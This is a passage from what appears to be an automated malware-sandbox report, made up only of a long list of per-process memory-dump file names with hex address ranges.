  • memory/5052-329-0x0000000000000000-mapping.dmp

  • memory/5064-130-0x0000000000000000-mapping.dmp

  • memory/5072-1780-0x0000000000000000-mapping.dmp

  • memory/5076-175-0x0000000000000000-mapping.dmp

  • memory/5080-312-0x0000000000000000-mapping.dmp

  • memory/5084-1786-0x0000000000000000-mapping.dmp

  • memory/5092-282-0x0000000000000000-mapping.dmp

  • memory/5096-174-0x0000000000000000-mapping.dmp

  • memory/5108-131-0x0000000000000000-mapping.dmp

  • memory/5112-246-0x0000000000000000-mapping.dmp

  • memory/5136-334-0x0000000000000000-mapping.dmp

  • memory/5136-333-0x0000000000000000-mapping.dmp

  • memory/5168-404-0x0000000000000000-mapping.dmp

  • memory/5192-416-0x0000000010000000-0x0000000010220000-memory.dmp

  • memory/5192-409-0x00000000746C0000-0x0000000074753000-memory.dmp

  • memory/5192-405-0x0000000000000000-mapping.dmp

  • memory/5208-598-0x0000000005150000-0x0000000005151000-memory.dmp

  • memory/5208-944-0x0000000006CE0000-0x0000000006CED000-memory.dmp

  • memory/5208-564-0x0000000000000000-mapping.dmp

  • memory/5208-572-0x00000000718A0000-0x0000000071F8E000-memory.dmp

  • memory/5208-586-0x00000000008B0000-0x00000000008B1000-memory.dmp

  • memory/5208-658-0x0000000004B60000-0x0000000004B7D000-memory.dmp

  • memory/5216-337-0x0000000000000000-mapping.dmp

  • memory/5216-338-0x0000000000000000-mapping.dmp

  • memory/5252-341-0x0000000000000000-mapping.dmp

  • memory/5252-342-0x0000000000000000-mapping.dmp

  • memory/5300-414-0x0000000000000000-mapping.dmp

  • memory/5304-432-0x0000000000000000-mapping.dmp

  • memory/5304-436-0x00000000746C0000-0x0000000074753000-memory.dmp

  • memory/5304-449-0x0000000003550000-0x00000000039B3000-memory.dmp

  • memory/5312-938-0x000000000046A08C-mapping.dmp

  • memory/5312-942-0x0000000000400000-0x00000000004C2000-memory.dmp

  • memory/5316-396-0x0000000000000000-mapping.dmp

  • memory/5348-447-0x0000000000000000-mapping.dmp

  • memory/5360-455-0x0000000000000000-mapping.dmp

  • memory/5372-433-0x0000000000000000-mapping.dmp

  • memory/5372-438-0x00000000746C0000-0x0000000074753000-memory.dmp

  • memory/5372-450-0x0000000003530000-0x0000000003993000-memory.dmp

  • memory/5392-488-0x00000000746C0000-0x0000000074753000-memory.dmp

  • memory/5392-484-0x0000000000000000-mapping.dmp

  • memory/5424-481-0x00007FF74FCA8270-mapping.dmp

  • memory/5424-483-0x00007FFD88AD0000-0x00007FFD88B4E000-memory.dmp

  • memory/5448-346-0x0000000000000000-mapping.dmp

  • memory/5448-345-0x0000000000000000-mapping.dmp

  • memory/5464-398-0x0000000000000000-mapping.dmp

  • memory/5468-690-0x00000000043E0000-0x00000000043E1000-memory.dmp

  • memory/5468-734-0x0000000004B10000-0x0000000004B38000-memory.dmp

  • memory/5468-739-0x0000000004B10000-0x0000000004B38000-memory.dmp

  • memory/5468-723-0x0000000005120000-0x0000000005121000-memory.dmp

  • memory/5468-767-0x0000000004B10000-0x0000000004B38000-memory.dmp

  • memory/5468-713-0x0000000004F40000-0x0000000004F41000-memory.dmp

  • memory/5476-399-0x0000000000000000-mapping.dmp

  • memory/5544-1809-0x0000000000000000-mapping.dmp

  • memory/5556-1181-0x0000000000000000-mapping.dmp

  • memory/5580-685-0x0000000000400000-0x0000000000554000-memory.dmp

  • memory/5580-682-0x0000000000405CE2-mapping.dmp

  • memory/5580-680-0x0000000000400000-0x0000000000554000-memory.dmp

  • memory/5632-476-0x00000000746C0000-0x0000000074753000-memory.dmp

  • memory/5632-472-0x0000000000000000-mapping.dmp

  • memory/5636-443-0x0000000000000000-mapping.dmp

  • memory/5668-1267-0x00000000041B0000-0x00000000041B1000-memory.dmp

  • memory/5668-1420-0x0000000004D60000-0x0000000004D61000-memory.dmp

  • memory/5668-1291-0x0000000004B60000-0x0000000004B61000-memory.dmp

  • memory/5692-351-0x0000000000000000-mapping.dmp

  • memory/5720-353-0x0000000000000000-mapping.dmp

  • memory/5724-459-0x00000000746C0000-0x0000000074753000-memory.dmp

  • memory/5724-456-0x0000000000000000-mapping.dmp

  • memory/5728-354-0x0000000000000000-mapping.dmp

  • memory/5784-657-0x0000000000000000-mapping.dmp

  • memory/5792-364-0x0000000000000000-mapping.dmp

  • memory/5804-747-0x000000000040715C-mapping.dmp

  • memory/5804-743-0x0000000000400000-0x000000000040F000-memory.dmp

  • memory/5804-755-0x0000000000400000-0x000000000040F000-memory.dmp

  • memory/5860-1526-0x0000000005980000-0x0000000005981000-memory.dmp

  • memory/5860-1464-0x0000000005980000-0x0000000005981000-memory.dmp

  • memory/5860-1485-0x0000000005980000-0x0000000005981000-memory.dmp

  • memory/5860-1494-0x0000000005980000-0x0000000005981000-memory.dmp

  • memory/5860-1495-0x0000000005980000-0x0000000005981000-memory.dmp

  • memory/5860-770-0x0000000005050000-0x0000000005051000-memory.dmp

  • memory/5860-800-0x0000000005980000-0x0000000005981000-memory.dmp

  • memory/5860-1496-0x0000000005980000-0x0000000005981000-memory.dmp

  • memory/5860-1502-0x0000000005980000-0x0000000005981000-memory.dmp

  • memory/5860-1504-0x0000000005980000-0x0000000005981000-memory.dmp

  • memory/5860-757-0x0000000004C50000-0x0000000004C51000-memory.dmp

  • memory/5860-1507-0x0000000005980000-0x0000000005981000-memory.dmp

  • memory/5860-791-0x0000000005880000-0x0000000005881000-memory.dmp

  • memory/5860-1509-0x0000000005980000-0x0000000005981000-memory.dmp

  • memory/5860-1520-0x0000000005980000-0x0000000005981000-memory.dmp

  • memory/5860-1512-0x0000000005980000-0x0000000005981000-memory.dmp

  • memory/5860-1525-0x0000000005980000-0x0000000005981000-memory.dmp

  • memory/5860-1523-0x0000000005980000-0x0000000005981000-memory.dmp

  • memory/5860-1514-0x0000000005980000-0x0000000005981000-memory.dmp

  • memory/5860-1522-0x0000000005980000-0x0000000005981000-memory.dmp

  • memory/5860-1518-0x0000000005980000-0x0000000005981000-memory.dmp

  • memory/5860-749-0x0000000004C50000-0x0000000004C51000-memory.dmp

  • memory/5860-1499-0x0000000005980000-0x0000000005981000-memory.dmp

  • memory/5868-371-0x0000000000400000-0x0000000000983000-memory.dmp

  • memory/5868-368-0x000000000066C0BC-mapping.dmp

  • memory/5868-367-0x0000000000400000-0x0000000000983000-memory.dmp

  • memory/5912-370-0x0000000000000000-mapping.dmp

  • memory/5928-491-0x0000000000000000-mapping.dmp

  • memory/5928-496-0x00000000746C0000-0x0000000074753000-memory.dmp

  • memory/5932-716-0x0000000000000000-mapping.dmp

  • memory/5936-554-0x0000000000000000-mapping.dmp

  • memory/5940-470-0x00007FF74FCA8270-mapping.dmp

  • memory/5940-471-0x00007FFD88AD0000-0x00007FFD88B4E000-memory.dmp

  • memory/5944-833-0x0000000000000000-mapping.dmp

  • memory/5948-372-0x0000000000000000-mapping.dmp

  • memory/5948-381-0x00000000718A0000-0x0000000071F8E000-memory.dmp

  • memory/5948-384-0x0000000010B00000-0x0000000010B01000-memory.dmp

  • memory/5948-389-0x0000000010B60000-0x0000000010B61000-memory.dmp

  • memory/5972-467-0x0000000000000000-mapping.dmp

  • memory/5984-812-0x0000000000000000-mapping.dmp

  • memory/6020-417-0x0000000000000000-mapping.dmp

  • memory/6032-380-0x0000000000000000-mapping.dmp

  • memory/6108-386-0x0000000000000000-mapping.dmp

  • memory/6112-478-0x0000000000000000-mapping.dmp

  • memory/6120-464-0x0000000000000000-mapping.dmp

  • memory/6136-761-0x0000000000000000-mapping.dmp

  • memory/6136-756-0x0000000000410000-0x0000000000411000-memory.dmp

  • memory/6136-748-0x0000000000000000-mapping.dmp

  • memory/6140-392-0x0000000000000000-mapping.dmp